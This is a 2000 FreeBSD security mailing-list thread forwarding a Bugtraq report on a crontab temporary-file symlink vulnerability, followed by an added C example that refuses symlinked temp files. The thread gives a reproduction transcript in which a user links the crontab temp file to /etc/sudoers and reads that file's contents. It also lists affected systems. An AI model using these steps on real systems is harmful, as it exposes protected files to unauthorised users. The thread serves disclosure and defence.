Date: Thu, 26 Oct 2000 14:36:25 +0200 (MET DST)
From: Konrad Heuer <kheuer@gwdg.de>
To: freebsd-security@freebsd.org
Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability (fwd)
Message-ID: <Pine.OSF.4.10.10010261430310.2401-100000@gwdu20.gwdg.de>

Exploit below could be reproduced on 4.1-R and Compaq Tru64 UNIX 4.0D; seems
to depend on the way vi stores edit info in /tmp. Exploit does not work
with emacs, e.g.

I removed suid bit of crontab as a workaround.

It's not possible for a user to modify files owned by someone else in this way.

Regards
K. Heuer (kheuer@gwdg.de)

---------- Forwarded message ----------
Date: Wed, 25 Oct 2000 12:30:47 +0200
From: "Fabio Pietrosanti (naif)" <fabio@telemail.it>
Reply-To: naif@inet.it
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability
Resent-Date: Thu, 26 Oct 2000 14:17:27 +0200 (MET DST)
Resent-From: Eckhard Handke <ehandke@gwdg.de>
Resent-To: Konrad Heuer <kheuer@gwdg.de>
Resent-Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability

Tested also on:

FreeBSD 3.3 = Vulnerable
FreeBSD 2.2.8 = Vulnerable
Aix 4.2 = Not Vulnerable
Linux Slackware 7.0 = Not Vulnerable
Linux Slackware 4.0 = Not Vulnerable

naif

On Tue, 24 Oct 2000, Sergey Nenashev wrote:

> Hi,
>
> Tested on
> 4.0-RELEASE FreeBSD 4.0-RELEASE #9
> 4.1-RELEASE FreeBSD 4.1-RELEASE #1:
>
>
> Can read any file which starts with comment symbol (#)
>
>
>
> $ ls -l /etc/sudoers
> -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
> $ id
> uid=1002(alf) gid=1002(alf) groups=1002(alf)
>
>
> $ crontab -e
> ~
> ~
> ~
> /tmp/crontab.hLmjTbK417
> :!sh
>
> [ #### Make symbolic link]
>
> rm /tmp/crontab.hLmjTbK417
>
> ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
>
> exit
>
> [ #### quit vi ]
> /tmp/crontab.hLmjTbK417
> crontab: installing new crontab
>
> [ #### start crontab editor]
>
> $ crontab -e
> [####### See in vi]
> # sudoers file.
> #
> # This file MUST be edited with the 'visudo' command as root.
> #
> # See the sudoers man page for the details on how to write a sudoers
> file.
> #
>
> # Host alias specification
>
> # User alias specification
>
> # Cmnd alias specification
>
> # User privilege specification
> root ALL=(ALL) ALL
> alf ALL=(ALL) ALL
> ~
> ~
> ~
>
>
>
>
> If file started with no # then crontab said
>
> "/tmp/crontab.GAeNMP1357":2: bad minute
> crontab: errors in crontab file, can't install
>
>
>
>
> --
> ------
> Alf Delems<alf@isd.memonet.ru>
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
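
Added example, not part of the original thread and not crontab's source: one way a privileged program can refuse to read an edited temporary file that was swapped for a symlink, by opening it without following links and comparing it with the file it created. The names reopen_checked and demo, and the paths under /tmp, are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added illustration (hypothetical names). Return an fd for path only if it
 * is still the regular file described by orig (recorded before editing). */
int reopen_checked(const char *path, const struct stat *orig)
{
    struct stat now;
    /* O_NOFOLLOW refuses a symlink; O_NONBLOCK avoids hanging on a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0) return -1;
    /* Check the opened object, not the path: no check-then-read window. */
    if (fstat(fd, &now) != 0 || !S_ISREG(now.st_mode) ||
        now.st_dev != orig->st_dev || now.st_ino != orig->st_ino ||
        now.st_uid != orig->st_uid || now.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: swap=1 replaces the temp file with a symlink to a
 * second file. Returns 1 if accepted, 0 if refused, -1 on setup error. */
int demo(int swap)
{
    char dir[] = "/tmp/reopen-demo.XXXXXX", tmp[64], other[64];
    struct stat orig;
    if (!mkdtemp(dir)) return -1;
    snprintf(tmp, sizeof tmp, "%s/crontab.tmp", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    int o = open(other, O_WRONLY | O_CREAT | O_EXCL, 0600);
    int t = open(tmp, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (o < 0 || t < 0 || fstat(t, &orig) != 0) return -1;
    close(o); close(t);
    if (swap && (unlink(tmp) != 0 || symlink(other, tmp) != 0)) return -1;
    int fd = reopen_checked(tmp, &orig);
    if (fd >= 0) close(fd);
    unlink(tmp); unlink(other); rmdir(dir);
    return fd >= 0;
}

int main(void)
{
    printf("untouched: %d, swapped for symlink: %d\n", demo(0), demo(1));
}
```

The device and inode comparison also refuses a file that an editor replaced by rename rather than writing in place, so a program using this check has to require in-place edits.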